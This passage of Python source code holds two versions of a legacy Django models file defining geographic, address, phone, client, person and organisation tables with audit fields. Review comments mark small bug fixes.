        verbose_name_plural = _('Districts')
        unique_together = (('name', 'region'), )
    class Admin:  # old-style (pre-1.0 Django) admin declaration
        list_display = ('name',)
        search_fields = ['name',]
    def __unicode__(self):
        return u"%s" % (self.name,)
class TownType(models.Model):
    """Lookup table for town kinds (e.g. city/village); shown by shortname."""
    shortname = models.CharField(max_length=5, blank=True, null=True)
    name = models.CharField(max_length=60, blank=True, null=True)
    # Audit trail.
    createuser = models.ForeignKey(User, related_name='created_towntypes', blank=True, null=True)
    createdate = models.DateTimeField(blank=True, auto_now_add=True)
    modifyuser = models.ForeignKey(User, related_name='modified_towntypes', blank=True, null=True)
    modifydate = models.DateTimeField(blank=True, auto_now=True)
    class Meta:
        verbose_name = _('TownType')
        verbose_name_plural = _('TownTypes')
    class Admin:  # old-style (pre-1.0 Django) admin declaration
        pass
    def __unicode__(self):
        return u"%s" % self.shortname
class Town(models.Model):
    """A populated place, optionally tied to country/region/district/type."""
    #code = models.CharField(_('Town Code'), max_length=6)
    country = models.ForeignKey(Country, blank=True, null=True, verbose_name=_('Country'))
    region = models.ForeignKey(Region, blank=True, null=True, verbose_name=_('Region'))
    district = models.ForeignKey(District, blank=True, null=True, verbose_name=_('District'))
    type = models.ForeignKey(TownType, verbose_name=_('Type'), blank=True, null=True)
    name = models.CharField(_('Town Name'), max_length=35)
    is_region_centre = models.BooleanField(_('IRC?')) #Is Region Centre?
    is_district_centre = models.BooleanField(_('IDC?')) #Is District Centre?
    # Audit trail.
    createuser = models.ForeignKey(User, related_name='created_towns', blank=True, null=True)
    createdate = models.DateTimeField(blank=True, auto_now_add=True)
    modifyuser = models.ForeignKey(User, related_name='modified_towns', blank=True, null=True)
    modifydate = models.DateTimeField(blank=True, auto_now=True)
    def __unicode__(self):
        return self.name
    class Meta:
        verbose_name = _('Town')
        verbose_name_plural = _('Towns')
        ordering = ('name',)
    class Admin:  # old-style (pre-1.0 Django) admin declaration
        list_display = ('type','name','region','district','is_region_centre','is_district_centre')
        #js = ('js/tiny_mce/tiny_mce.js','js/tiny_mce/textareas.js'),
        list_filter = ['createdate']
        search_fields = ['name',]
class StreetType(models.Model):
    """Lookup table for street kinds (e.g. street/avenue); shown by shortname."""
    shortname = models.CharField(max_length=5, blank=True, null=True)
    name = models.CharField(max_length=60, blank=True, null=True)
    # Audit trail.
    createuser = models.ForeignKey(User, related_name='created_streettypes', blank=True, null=True)
    createdate = models.DateTimeField(blank=True, auto_now_add=True)
    modifyuser = models.ForeignKey(User, related_name='modified_streettypes', blank=True, null=True)
    modifydate = models.DateTimeField(blank=True, auto_now=True)
    class Meta:
        verbose_name = _('StreetType')
        verbose_name_plural = _('StreetTypes')
    class Admin:  # old-style (pre-1.0 Django) admin declaration
        pass
    def __unicode__(self):
        return u"%s" % self.shortname
class Street(models.Model):
    """A street name; referenced by Location.  StreetType link is disabled."""
    #addr_code = models.CharField(_('Street Code'), max_length=6)
    name = models.CharField(_('Street Name'), max_length=100)
    #type = models.ForeignKey(StreetType, null=True)
    # Audit trail.
    createuser = models.ForeignKey(User, related_name='created_streets', blank=True, null=True)
    createdate = models.DateTimeField(blank=True, auto_now_add=True)
    modifyuser = models.ForeignKey(User, related_name='modified_streets', blank=True, null=True)
    modifydate = models.DateTimeField(blank=True, auto_now=True)
    class Meta:
        verbose_name = _('Street')
        verbose_name_plural = _('Streets')
        ordering = ('name',)
    class Admin:  # old-style (pre-1.0 Django) admin declaration
        list_display = ('name',)
    def __unicode__(self):
        return u"%s" % self.name
# Allowed values for Phone.type: city landline, fax, or mobile number.
PHONE_CHOICES = (
    ('P', _('City Number')),
    ('F', _('Fax Number')),
    ('M', _('Mobile Number')),
)
class Phone(models.Model):
    """A unique phone number with a one-letter type (see PHONE_CHOICES)."""
    type = models.CharField(_('Phone Type'), max_length=1, choices=PHONE_CHOICES)
    number = models.CharField(_('Phone Number'), unique=True, max_length=30)
    # Audit trail.
    createuser = models.ForeignKey(User, related_name='created_phones', blank=True, null=True)
    createdate = models.DateTimeField(blank=True, auto_now_add=True)
    modifyuser = models.ForeignKey(User, related_name='modified_phones', blank=True, null=True)
    modifydate = models.DateTimeField(blank=True, auto_now=True)
    class Meta:
        verbose_name = _('Phone')
        verbose_name_plural = _('Phones')
    class Admin:  # old-style (pre-1.0 Django) admin declaration
        list_display = ('type','number','createuser')
        search_fields = ['number',]
    def __unicode__(self):
        return u"%s %s" % (self.type, self.number)
class PhoneList(models.Model):
    """Attaches a Phone to any model instance via a generic foreign key."""
    number = models.ForeignKey(Phone, verbose_name=_('Phone Number'))
    # Generic FK target: (content_type, object_id) -> content_object.
    content_type = models.ForeignKey(ContentType, verbose_name=_('Content'))
    object_id = models.IntegerField()
    # Audit trail.
    createuser = models.ForeignKey(User, related_name='created_phonelist', blank=True, null=True)
    createdate = models.DateTimeField(blank=True, auto_now_add=True)
    modifyuser = models.ForeignKey(User, related_name='modified_phonelist', blank=True, null=True)
    modifydate = models.DateTimeField(blank=True, auto_now=True)
    content_object = generic.GenericForeignKey()
    class Meta:
        verbose_name = _('Phone List')
        verbose_name_plural = _('Phone Lists')
    class Admin:  # old-style (pre-1.0 Django) admin declaration
        list_display = ('number','content_type','object_id','createuser')
    def __unicode__(self):
        return u"%s" % (self.number)
class Addresstype(models.Model):
    """Lookup table for address kinds, keyed by a unique short name."""
    shortname = models.CharField(_('Addresstype Short Name'), max_length=20, unique=True)
    name = models.CharField(_('Addresstype Name'), max_length=40)
    # Audit trail.
    createuser = models.ForeignKey(User, related_name='created_addresstype', blank=True, null=True)
    createdate = models.DateTimeField(blank=True, auto_now_add=True)
    modifyuser = models.ForeignKey(User, related_name='modified_addresstype', blank=True, null=True)
    modifydate = models.DateTimeField(blank=True, auto_now=True)
    class Meta:
        verbose_name = _('Address Type')
        verbose_name_plural = _('Address Types')
    class Admin:  # old-style (pre-1.0 Django) admin declaration
        list_display = ('shortname','name','createuser')
    def __unicode__(self):
        return u"%s" % (self.shortname)
class Location(models.Model):
    """A postal location: zipcode, town(s), street, building, free-form extra."""
    zipcode = models.CharField(_('Zipcode'), max_length=10, blank=True)
    town = models.ForeignKey(Town, blank=True, null=True, verbose_name=_('Town'))
    town_aux = models.ForeignKey(Town, related_name='town_aux', blank=True, null=True, verbose_name=_('Town (Aux.)'))
    street = models.ForeignKey(Street, blank=True, null=True, verbose_name=_('Street'))
    building = models.CharField(_('Building'), max_length=35, blank=True)
    extention = models.TextField(_('Extention'), blank=True)
    # Audit trail.
    createuser = models.ForeignKey(User, related_name='created_locations', blank=True, null=True)
    createdate = models.DateTimeField(blank=True, auto_now_add=True)
    modifyuser = models.ForeignKey(User, related_name='modified_locations', blank=True, null=True)
    modifydate = models.DateTimeField(blank=True, auto_now=True)
    class Meta:
        verbose_name = _('Location')
        verbose_name_plural = _('Locations')
    class Admin:  # old-style (pre-1.0 Django) admin declaration
        list_display = ('zipcode','town','street','building','extention')
    def __unicode__(self):
        # Builds "zipcode, region, district, <type><town>, street, building".
        loc_str = u""
        if self.zipcode:
            loc_str = loc_str + u"%s" % self.zipcode
        if self.town:
            # NOTE(review): the region line is guarded by self.town.district,
            # not by a region-related flag -- looks suspicious, confirm intent.
            if not self.town.is_region_centre and self.town.district:
                loc_str = loc_str + u", %s" % self.town.region
            if not self.town.is_district_centre and self.town.district:
                loc_str = loc_str + u", %s" % (self.town.district,)
            loc_str = u"%s, %s%s" % (loc_str, self.town.type, self.town)
        for elem in (self.street, self.building):
            if elem:
                loc_str = loc_str + u", %s" % elem
        return loc_str
class Address(models.Model):
    """A Location plus an optional in-building place (office, flat, ...)."""
    location = models.ForeignKey(Location, verbose_name=_('Location'), blank=True, null=True)
    place = models.CharField(max_length=15, blank=True)
    # Audit trail.
    createuser = models.ForeignKey(User, related_name='created_addresses', blank=True, null=True)
    createdate = models.DateTimeField(blank=True, auto_now_add=True)
    modifyuser = models.ForeignKey(User, related_name='modified_addresses', blank=True, null=True)
    modifydate = models.DateTimeField(blank=True, auto_now=True)
    class Meta:
        verbose_name = _('Address')
        verbose_name_plural = _('Addresses')
    class Admin:  # old-style (pre-1.0 Django) admin declaration
        list_display = ('location', 'place')
    def __unicode__(self):
        if self.place:
            return u"%s, %s" % (self.location, self.place)
        else:
            return u"%s" % self.location
class Client(models.Model):
    """A billing client wrapping any model (Person, Org, ...) via a generic FK."""
    # Generic FK target: (content_type, object_id) -> content_object.
    content_type = models.ForeignKey(ContentType, verbose_name=_('Content'))
    object_id = models.PositiveIntegerField()
    is_facture_required = models.BooleanField(_('Is Facture Required?')) #FIXME:, blank=True, null=True)
    # Audit trail.
    createuser = models.ForeignKey(User, related_name='created_clients', blank=True, null=True)
    createdate = models.DateTimeField(blank=True, auto_now_add=True)
    modifyuser = models.ForeignKey(User, related_name='modified_clients', blank=True, null=True)
    modifydate = models.DateTimeField(blank=True, auto_now=True)
    content_object = generic.GenericForeignKey()
    def _name(self):
        # Delegates to the wrapped object's own .name attribute/property.
        return u"%s" % self.content_object.name
    name = property(_name)
    class Meta:
        verbose_name = _('Client')
        verbose_name_plural = _('Clients')
    class Admin:  # old-style (pre-1.0 Django) admin declaration
        list_display = ('id','name')
        search_fields = ('id',)
    def __unicode__(self):
        return u"%s" % self.content_object
    def setContentData(self, obj):
        """Point this client at *obj* by filling content_type/object_id."""
        if obj:
            #from django.contrib.contenttypes.models import ContentType
            ct = ContentType.objects.filter(model__exact=obj._meta.module_name)
            self.content_type = ct[0]
            self.object_id = obj.id
    def _getStaffList(client, as_choices=True):
        """Employees of the wrapped object; as (fullname, id) pairs by default."""
        obj_list = []
        if client:
            temp_list = client.content_object.employee_set.all()
            if temp_list:
                if as_choices:
                    obj_list = [(elem.person.fullname, elem.id) for elem in temp_list]
                else:
                    obj_list = temp_list
        return obj_list
    getStaffList = staticmethod(_getStaffList)
    def getInvoicesToBePaid(self):
        """Invoices neither fully paid nor written off.

        Uses a constant raw-SQL WHERE fragment via .extra() -- no user input
        is interpolated, so no injection risk here.
        """
        obj_list = self.invoice_set.all().extra(where=['paym_complete is not True and wontbepaid is not True'])
        return obj_list
class Person(models.Model):
    """A physical person with contact details.

    Can act as a billing Client through the ``clients`` generic relation.
    Fix in this revision: ``_get_initials`` and ``__unicode__`` both guarded
    the *middlename* part with ``if self.firstname:``, so a person with a
    first name but an empty middle name got a stray ``"."`` (initials) or a
    wrong middle token; both guards now test ``self.middlename``.
    """
    firstname = models.CharField(_('First Name'), max_length=35) #, core=True)
    middlename = models.CharField(_('Middle Name'), max_length=35, blank=True)
    lastname = models.CharField(_('Last Name'), max_length=35)
    town = models.ForeignKey(Town, blank=True, null=True, verbose_name=_('Town'))
    email = models.EmailField(_('Email'), blank=True) #FIXME:, validator_list=[isValidEmail])
    web = models.CharField(_('Web Site'), max_length=40, blank=True, null=True)
    im = models.CharField(_('Instant Messenger'), max_length=40, blank=True, null=True)
    info = models.TextField(_('Info'), blank=True)
    # Audit trail.
    createuser = models.ForeignKey(User, related_name='created_people', blank=True, null=True)
    createdate = models.DateTimeField(blank=True, auto_now_add=True)
    modifyuser = models.ForeignKey(User, related_name='modified_people', blank=True, null=True)
    modifydate = models.DateTimeField(blank=True, auto_now=True)
    clients = generic.GenericRelation(Client) #, verbose_name=_('Client'), blank=True, null=True)
    def _get_fullname(self):
        """Return "<last> <first> <middle>"."""
        return u"%s %s %s" % (self.lastname, self.firstname, self.middlename)
    fullname = property(_get_fullname)
    name = property(_get_fullname)
    def _get_phone_list(self):
        """PhoneList rows generically attached to this person."""
        ct = ContentType.objects.get_for_model(self)
        phones = PhoneList.objects.filter(content_type__id__exact=ct.id, object_id__exact=self.id)
        return phones
    phone_list = property(_get_phone_list)
    def _get_employment_list(self):
        """Employee rows referencing this person."""
        employment = Employee.objects.filter(person__id__exact=self.id)
        return employment
    employment_list = property(_get_employment_list)
    def _get_initials(self):
        """Return "<lastname> <Fi>.<Mi>." using two-character abbreviations."""
        last = u""
        first = u""
        middle = u""
        if self.lastname:
            last = u"%s" % self.lastname
        if self.firstname:
            first = u"%s." % self.firstname[:2]
            #first = self.firstname[0]
        if self.middlename:  # BUG FIX: previously tested self.firstname
            middle = u"%s." % self.middlename[:2]
            #middle = self.middlename[0]
        return u"%s %s%s" % (last, first, middle)
    initials = property(_get_initials)
    def get_phones(self):
        """Space-separated string of the person's phone numbers.

        NOTE(review): ``self.phones`` is not defined in this file -- confirm
        a related manager named 'phones' exists on this model elsewhere.
        """
        phone_list = u""
        for phone in self.phones.all():
            phone_list = phone_list + u" %s" % phone
        return phone_list
    class Meta:
        verbose_name = _('Person')
        verbose_name_plural = _('People')
    class Admin:  # old-style (pre-1.0 Django) admin declaration
        js = ('/site_media/js/tags.js',)
        fields = (
            (None, {'fields': ('lastname','firstname','middlename','town','info', 'web','email','im')}),
            ('Date information',{'classes':'collapse','fields':('createuser','modifyuser','createdate','modifydate')}),
        )
        list_display = ('fullname', 'get_phones', 'email', 'town', 'createuser', 'modifyuser')
        search_fields = ('lastname', 'firstname', 'middlename', 'info')
    def colored_name(self):
        return '<span style="color: red;">%s</span>' % (self.lastname)
    colored_name.allow_tags = True
    def __unicode__(self):
        last = u""
        first = u""
        middle = u""
        if self.lastname:
            last = u"%s" % self.lastname
        if self.firstname:
            first = u"%s" % self.firstname
        if self.middlename:  # BUG FIX: previously tested self.firstname
            middle = u"%s" % self.middlename
        return u"%s %s %s" % (last, first, middle)
class Orgtype(models.Model):
 # Dictionary table of organization types (short code + name), with audit fields.
 code = models.CharField(_('Orgtype Code'), max_length=10)
 name = models.CharField(_('Orgtype Name'), max_length=60)
 createuser = models.ForeignKey(User, related_name='created_orgtypes', blank=True, null=True)
 createdate = models.DateTimeField(blank=True, auto_now_add=True)
 modifyuser = models.ForeignKey(User, related_name='modified_orgtypes', blank=True, null=True)
 modifydate = models.DateTimeField(blank=True, auto_now=True)
 class Meta:
  verbose_name = _('Org Type')
  verbose_name_plural = _('Org Types')
 class Admin:
  fields = (
   (None, {'fields': ('code','name', )}),
  )
 def __unicode__(self):
  # Show the short code in admin/select widgets.
  return u"%s" % self.code
class Org(models.Model):
 # An organization; can be marked as a client via the generic relation.
 type = models.ForeignKey(Orgtype, blank=True, null=True, verbose_name=_('Org Type'))
 code = models.CharField(_('Org Code'), max_length=15, blank=True)
 alias = models.CharField(_('Org Alias'), max_length=100, blank=True)
 name = models.CharField(_('Org Name'), max_length=200,blank=True)
 fullname = models.CharField(_('Org Full Name'), max_length=200,blank=True)
 #org_parentref = models.ForeignKey('self', null=True, blank=True)
 town = models.ForeignKey(Town, blank=True, null=True, verbose_name=_('Town'))
 #phones = PhonesField(Phone, blank=True)
 email = models.EmailField(_('Email'), blank=True) #FIXME:, validator_list=[isValidEmail])
 http = models.CharField(_('Web Site'), max_length=40,blank=True)
 info = models.TextField(_('Info'), max_length=256, blank=True, help_text='Rich Text Editing.')
 contacted = models.DateField(blank=True, null=True)
 createuser = models.ForeignKey(User, related_name='created_orgs', blank=True, null=True)
 createdate = models.DateTimeField(blank=True, auto_now_add=True)
 modifyuser = models.ForeignKey(User, related_name='modified_orgs', blank=True, null=True)
 modifydate = models.DateTimeField(blank=True, auto_now=True)
 clients = generic.GenericRelation(Client) #, verbose_name=_('Client'), blank=True, null=True)
 class Meta:
  verbose_name = _('Organization')
  verbose_name_plural = _('Organizations')
 class Admin:
  js = ('/site_media/js/tags.js',)
  fields = (
   (None, {'fields': ('type', 'code', 'alias', 'name', 'fullname', 'town', 'email', 'http', 'info', 'contacted')}),
   ('Date information', {'classes': 'collapse', 'fields': ('createuser', 'modifyuser', 'createdate', 'modifydate')}),
  )
  list_display = ('code', 'name', 'get_phones', 'email', 'createuser', 'modifyuser')
  search_fields = ['code', 'alias', 'name', 'fullname', 'email', 'info']
 def __unicode__(self):
  return u"%s" % self.name
 def get_phones(self):
  # Space-separated string of all attached phones, for admin list display.
  # NOTE(review): relies on a 'phones' relation that is not declared on this
  # model in this file -- verify it exists (e.g. a related_name elsewhere).
  phone_list = u""
  for phone in self.phones.all():
   phone_list = phone_list + u" %s" % phone
  return phone_list
 def _is_client(self):
  # True when at least one Client row points at this organization.
  if self.client_set.count():
   return True
  else:
   return False
 is_client = property(_is_client)
 def getShortLegalName(self):
  # "<type> <name>" when a legal type is set, otherwise just the name.
  if self.type:
   legal_name = u"%s %s" % (self.type, self.name)
  else:
   legal_name = u"%s" % self.name
  return legal_name
#admin.site.register(Person)
|
#
#
#
from string import find
from django.db import models
#from django.core import validators
#from django.core.validators import isValidEmail
from django.utils.translation import gettext_lazy as _
from django.contrib.contenttypes.models import ContentType
from django.contrib.contenttypes import generic
from django.contrib import admin
from django.contrib.auth.models import User
from serpantin.dojoforms import *
class Country(models.Model):
 # Reference table of countries, with audit fields; ordered by name.
 #addr_code = models.CharField(_('Street Code'), max_length=6)
 name = models.CharField(_('Country Name'), max_length=100)
 createuser = models.ForeignKey(User, related_name='created_countries', blank=True, null=True)
 createdate = models.DateTimeField(blank=True, auto_now_add=True)
 modifyuser = models.ForeignKey(User, related_name='modified_countries', blank=True, null=True)
 modifydate = models.DateTimeField(blank=True, auto_now=True)
 class Meta:
  verbose_name = _('Country')
  verbose_name_plural = _('Countries')
  ordering = ('name',)
 class Admin:
  fields = (
   (None, {'fields': ('name',)}),
  )
  list_display = ('name',)
 def __unicode__(self):
  return self.name
class Region(models.Model):
 # A region inside a country; region names are unique.
 country = models.ForeignKey(Country, blank=True, null=True, verbose_name=_('Country'))
 #FIXME: shortname is too short
 #shortname = models.CharField(_('Region Code'), max_length=6, unique=True, blank=True)
 name = models.CharField(_('Region Name'), max_length=100, unique=True)
 createuser = models.ForeignKey(User, related_name='created_regions', blank=True, null=True)
 createdate = models.DateTimeField(blank=True, auto_now_add=True)
 # NOTE(review): related_name 'modified_regionss' has a doubled "s"; existing
 # queries may depend on it, so confirm before renaming.
 modifyuser = models.ForeignKey(User, related_name='modified_regionss', blank=True, null=True)
 modifydate = models.DateTimeField(blank=True, auto_now=True)
 class Meta:
  verbose_name = _('Region')
  verbose_name_plural = _('Regions')
 class Admin:
  fields = (
   (None, {'fields': ('name',)}),
  )
  list_display = ('name',)
 def __unicode__(self):
  return self.name
class District(models.Model):
 # A district inside a region; (name, region) pairs are unique.
 name = models.CharField(_('District Name'), max_length=60, blank=True)
 region = models.ForeignKey(Region, verbose_name=_('Region Name'), blank=True, null=True)
 createuser = models.ForeignKey(User, related_name='created_districts', blank=True, null=True)
 createdate = models.DateTimeField(blank=True, auto_now_add=True)
 modifyuser = models.ForeignKey(User, related_name='modified_districts', blank=True, null=True)
 modifydate = models.DateTimeField(blank=True, auto_now=True)
 class Meta:
  verbose_name = _('District')
  verbose_name_plural = _('Districts')
  unique_together = (('name', 'region'), )
 class Admin:
  list_display = ('name',)
  search_fields = ['name',]
 def __unicode__(self):
  return u"%s" % (self.name,)
class TownType(models.Model):
 # Dictionary of settlement types; __unicode__ shows the short form.
 shortname = models.CharField(max_length=5, blank=True, null=True)
 name = models.CharField(max_length=60, blank=True, null=True)
 createuser = models.ForeignKey(User, related_name='created_towntypes', blank=True, null=True)
 createdate = models.DateTimeField(blank=True, auto_now_add=True)
 modifyuser = models.ForeignKey(User, related_name='modified_towntypes', blank=True, null=True)
 modifydate = models.DateTimeField(blank=True, auto_now=True)
 class Meta:
  verbose_name = _('TownType')
  verbose_name_plural = _('TownTypes')
 class Admin:
  pass
 def __unicode__(self):
  return u"%s" % self.shortname
class Town(models.Model):
 # A settlement, located in a country/region/district hierarchy.
 #code = models.CharField(_('Town Code'), max_length=6)
 country = models.ForeignKey(Country, blank=True, null=True, verbose_name=_('Country'))
 region = models.ForeignKey(Region, blank=True, null=True, verbose_name=_('Region'))
 district = models.ForeignKey(District, blank=True, null=True, verbose_name=_('District'))
 type = models.ForeignKey(TownType, verbose_name=_('Type'), blank=True, null=True)
 name = models.CharField(_('Town Name'), max_length=35)
 is_region_centre = models.BooleanField(_('IRC?')) #Is Region Centre?
 is_district_centre = models.BooleanField(_('IDC?')) #Is District Centre?
 createuser = models.ForeignKey(User, related_name='created_towns', blank=True, null=True)
 createdate = models.DateTimeField(blank=True, auto_now_add=True)
 modifyuser = models.ForeignKey(User, related_name='modified_towns', blank=True, null=True)
 modifydate = models.DateTimeField(blank=True, auto_now=True)
 def __unicode__(self):
  return self.name
 class Meta:
  verbose_name = _('Town')
  verbose_name_plural = _('Towns')
  ordering = ('name',)
 class Admin:
  list_display = ('type','name','region','district','is_region_centre','is_district_centre')
  #js = ('js/tiny_mce/tiny_mce.js','js/tiny_mce/textareas.js'),
  list_filter = ['createdate']
  search_fields = ['name',]
class StreetType(models.Model):
 # Dictionary of street types; __unicode__ shows the short form.
 shortname = models.CharField(max_length=5, blank=True, null=True)
 name = models.CharField(max_length=60, blank=True, null=True)
 createuser = models.ForeignKey(User, related_name='created_streettypes', blank=True, null=True)
 createdate = models.DateTimeField(blank=True, auto_now_add=True)
 modifyuser = models.ForeignKey(User, related_name='modified_streettypes', blank=True, null=True)
 modifydate = models.DateTimeField(blank=True, auto_now=True)
 class Meta:
  verbose_name = _('StreetType')
  verbose_name_plural = _('StreetTypes')
 class Admin:
  pass
 def __unicode__(self):
  return u"%s" % self.shortname
class Street(models.Model):
 # Reference table of street names, ordered alphabetically.
 #addr_code = models.CharField(_('Street Code'), max_length=6)
 name = models.CharField(_('Street Name'), max_length=100)
 #type = models.ForeignKey(StreetType, null=True)
 createuser = models.ForeignKey(User, related_name='created_streets', blank=True, null=True)
 createdate = models.DateTimeField(blank=True, auto_now_add=True)
 modifyuser = models.ForeignKey(User, related_name='modified_streets', blank=True, null=True)
 modifydate = models.DateTimeField(blank=True, auto_now=True)
 class Meta:
  verbose_name = _('Street')
  verbose_name_plural = _('Streets')
  ordering = ('name',)
 class Admin:
  list_display = ('name',)
 def __unicode__(self):
  return u"%s" % self.name
# Allowed phone kinds: landline, fax, mobile.
PHONE_CHOICES = (
 ('P', _('City Number')),
 ('F', _('Fax Number')),
 ('M', _('Mobile Number')),
)
class Phone(models.Model):
 # A single phone number (globally unique), typed by PHONE_CHOICES.
 type = models.CharField(_('Phone Type'), max_length=1, choices=PHONE_CHOICES)
 number = models.CharField(_('Phone Number'), unique=True, max_length=30)
 createuser = models.ForeignKey(User, related_name='created_phones', blank=True, null=True)
 createdate = models.DateTimeField(blank=True, auto_now_add=True)
 modifyuser = models.ForeignKey(User, related_name='modified_phones', blank=True, null=True)
 modifydate = models.DateTimeField(blank=True, auto_now=True)
 class Meta:
  verbose_name = _('Phone')
  verbose_name_plural = _('Phones')
 class Admin:
  list_display = ('type','number','createuser')
  search_fields = ['number',]
 def __unicode__(self):
  return u"%s %s" % (self.type, self.number)
class PhoneList(models.Model):
 # Generic link table attaching a Phone to any model instance
 # (content_type + object_id form the generic foreign key).
 number = models.ForeignKey(Phone, verbose_name=_('Phone Number'))
 content_type = models.ForeignKey(ContentType, verbose_name=_('Content'))
 object_id = models.IntegerField()
 createuser = models.ForeignKey(User, related_name='created_phonelist', blank=True, null=True)
 createdate = models.DateTimeField(blank=True, auto_now_add=True)
 modifyuser = models.ForeignKey(User, related_name='modified_phonelist', blank=True, null=True)
 modifydate = models.DateTimeField(blank=True, auto_now=True)
 content_object = generic.GenericForeignKey()
 class Meta:
  verbose_name = _('Phone List')
  verbose_name_plural = _('Phone Lists')
 class Admin:
  list_display = ('number','content_type','object_id','createuser')
 def __unicode__(self):
  return u"%s" % (self.number)
class Addresstype(models.Model):
 # Dictionary of address types (unique short name + full name).
 shortname = models.CharField(_('Addresstype Short Name'), max_length=20, unique=True)
 name = models.CharField(_('Addresstype Name'), max_length=40)
 createuser = models.ForeignKey(User, related_name='created_addresstype', blank=True, null=True)
 createdate = models.DateTimeField(blank=True, auto_now_add=True)
 modifyuser = models.ForeignKey(User, related_name='modified_addresstype', blank=True, null=True)
 modifydate = models.DateTimeField(blank=True, auto_now=True)
 class Meta:
  verbose_name = _('Address Type')
  verbose_name_plural = _('Address Types')
 class Admin:
  list_display = ('shortname','name','createuser')
 def __unicode__(self):
  return u"%s" % (self.shortname)
class Location(models.Model):
 """A postal location (zipcode/town/street/building) rendered as one string."""
 zipcode = models.CharField(_('Zipcode'), max_length=10, blank=True)
 town = models.ForeignKey(Town, blank=True, null=True, verbose_name=_('Town'))
 town_aux = models.ForeignKey(Town, related_name='town_aux', blank=True, null=True, verbose_name=_('Town (Aux.)'))
 street = models.ForeignKey(Street, blank=True, null=True, verbose_name=_('Street'))
 building = models.CharField(_('Building'), max_length=35, blank=True)
 extention = models.TextField(_('Extention'), blank=True)
 createuser = models.ForeignKey(User, related_name='created_locations', blank=True, null=True)
 createdate = models.DateTimeField(blank=True, auto_now_add=True)
 modifyuser = models.ForeignKey(User, related_name='modified_locations', blank=True, null=True)
 modifydate = models.DateTimeField(blank=True, auto_now=True)
 class Meta:
  verbose_name = _('Location')
  verbose_name_plural = _('Locations')
 class Admin:
  list_display = ('zipcode','town','street','building','extention')
 def __unicode__(self):
  # Build "zipcode, region, district, <type><town>, street, building",
  # omitting the region/district lines for their respective centres.
  loc_str = u""
  if self.zipcode:
   loc_str = loc_str + u"%s" % self.zipcode
  if self.town:
   # BUGFIX: the region line was guarded by self.town.district, which
   # dropped the region for towns that have a region but no district.
   if not self.town.is_region_centre and self.town.region:
    loc_str = loc_str + u", %s" % self.town.region
   if not self.town.is_district_centre and self.town.district:
    loc_str = loc_str + u", %s" % (self.town.district,)
   loc_str = u"%s, %s%s" % (loc_str, self.town.type, self.town)
  for elem in (self.street, self.building):
   if elem:
    loc_str = loc_str + u", %s" % elem
  return loc_str
class Address(models.Model):
 # A Location plus an optional free-form place label (e.g. room/office).
 location = models.ForeignKey(Location, verbose_name=_('Location'), blank=True, null=True)
 place = models.CharField(max_length=15, blank=True)
 createuser = models.ForeignKey(User, related_name='created_addresses', blank=True, null=True)
 createdate = models.DateTimeField(blank=True, auto_now_add=True)
 modifyuser = models.ForeignKey(User, related_name='modified_addresses', blank=True, null=True)
 modifydate = models.DateTimeField(blank=True, auto_now=True)
 class Meta:
  verbose_name = _('Address')
  verbose_name_plural = _('Addresses')
 class Admin:
  list_display = ('location', 'place')
 def __unicode__(self):
  if self.place:
   return u"%s, %s" % (self.location, self.place)
  else:
   return u"%s" % self.location
class Client(models.Model):
 # Marks any model instance (linked via a generic FK) as a client.
 content_type = models.ForeignKey(ContentType, verbose_name=_('Content'))
 object_id = models.PositiveIntegerField()
 is_facture_required = models.BooleanField(_('Is Facture Required?')) #FIXME:, blank=True, null=True)
 createuser = models.ForeignKey(User, related_name='created_clients', blank=True, null=True)
 createdate = models.DateTimeField(blank=True, auto_now_add=True)
 modifyuser = models.ForeignKey(User, related_name='modified_clients', blank=True, null=True)
 modifydate = models.DateTimeField(blank=True, auto_now=True)
 content_object = generic.GenericForeignKey()
 def _name(self):
  # Delegate the display name to the linked object.
  return u"%s" % self.content_object.name
 name = property(_name)
 class Meta:
  verbose_name = _('Client')
  verbose_name_plural = _('Clients')
 class Admin:
  list_display = ('id','name')
  search_fields = ('id',)
 def __unicode__(self):
  return u"%s" % self.content_object
 def setContentData(self, obj):
  # Point this client at `obj`, resolving its ContentType from the model name.
  if obj:
   #from django.contrib.contenttypes.models import ContentType
   ct = ContentType.objects.filter(model__exact=obj._meta.module_name)
   self.content_type = ct[0]
   self.object_id = obj.id
 def _getStaffList(client, as_choices=True):
  # Employees of the linked object, optionally as choice tuples.
  # NOTE(review): the tuples are (fullname, id); Django choices are normally
  # (value, label) -- confirm the intended order with the callers.
  obj_list = []
  if client:
   temp_list = client.content_object.employee_set.all()
   if temp_list:
    if as_choices:
     obj_list = [(elem.person.fullname, elem.id) for elem in temp_list]
    else:
     obj_list = temp_list
  return obj_list
 getStaffList = staticmethod(_getStaffList)
 def getInvoicesToBePaid(self):
  # Invoices that are neither fully paid nor written off.
  obj_list = self.invoice_set.all().extra(where=['paym_complete is not True and wontbepaid is not True'])
  return obj_list
class Person(models.Model):
 """A physical person (contact); can be marked as a client via the generic relation."""
 firstname = models.CharField(_('First Name'), max_length=35) #, core=True)
 middlename = models.CharField(_('Middle Name'), max_length=35, blank=True)
 lastname = models.CharField(_('Last Name'), max_length=35)
 town = models.ForeignKey(Town, blank=True, null=True, verbose_name=_('Town'))
 email = models.EmailField(_('Email'), blank=True) #FIXME:, validator_list=[isValidEmail])
 web = models.CharField(_('Web Site'), max_length=40, blank=True, null=True)
 im = models.CharField(_('Instant Messenger'), max_length=40, blank=True, null=True)
 info = models.TextField(_('Info'), blank=True)
 createuser = models.ForeignKey(User, related_name='created_people', blank=True, null=True)
 createdate = models.DateTimeField(blank=True, auto_now_add=True)
 modifyuser = models.ForeignKey(User, related_name='modified_people', blank=True, null=True)
 modifydate = models.DateTimeField(blank=True, auto_now=True)
 clients = generic.GenericRelation(Client) #, verbose_name=_('Client'), blank=True, null=True)
 def _get_fullname(self):
  # "Lastname Firstname Middlename" display form.
  return u"%s %s %s" % (self.lastname, self.firstname, self.middlename)
 fullname = property(_get_fullname)
 name = property(_get_fullname)
 def _get_phone_list(self):
  # Phones attached to this person through the PhoneList generic link table.
  ct = ContentType.objects.get_for_model(self)
  phones = PhoneList.objects.filter(content_type__id__exact=ct.id, object_id__exact=self.id)
  return phones
 phone_list = property(_get_phone_list)
 def _get_employment_list(self):
  # All Employee records referencing this person.
  employment = Employee.objects.filter(person__id__exact=self.id)
  return employment
 employment_list = property(_get_employment_list)
 def _get_initials(self):
  # Abbreviated "Lastname Fi.Mi." display form.
  last = u""
  first = u""
  middle = u""
  if self.lastname:
   last = u"%s" % self.lastname
  if self.firstname:
   first = u"%s." % self.firstname[:2]
   #first = self.firstname[0]
  if self.middlename:  # BUGFIX: previously tested self.firstname before reading middlename
